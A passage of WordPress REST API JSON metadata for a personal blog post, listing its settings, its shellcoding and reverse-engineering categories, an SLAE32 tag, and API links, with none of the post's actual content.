of&hellip;<\/p>\n","protected":false},"author":1,"featured_media":305,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29,6,30,26,28],"tags":[27],"class_list":["post-274","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-assembly","category-certifications","category-linux","category-reverse-engineering","category-shellcoding","tag-slae32"],"_links":{"self":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=274"}],"version-history":[{"count":19,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/274\/revisions"}],"predecessor-version":[{"id":760,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/274\/revisions\/760"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media\/305"}],"wp:attachment":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk
\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}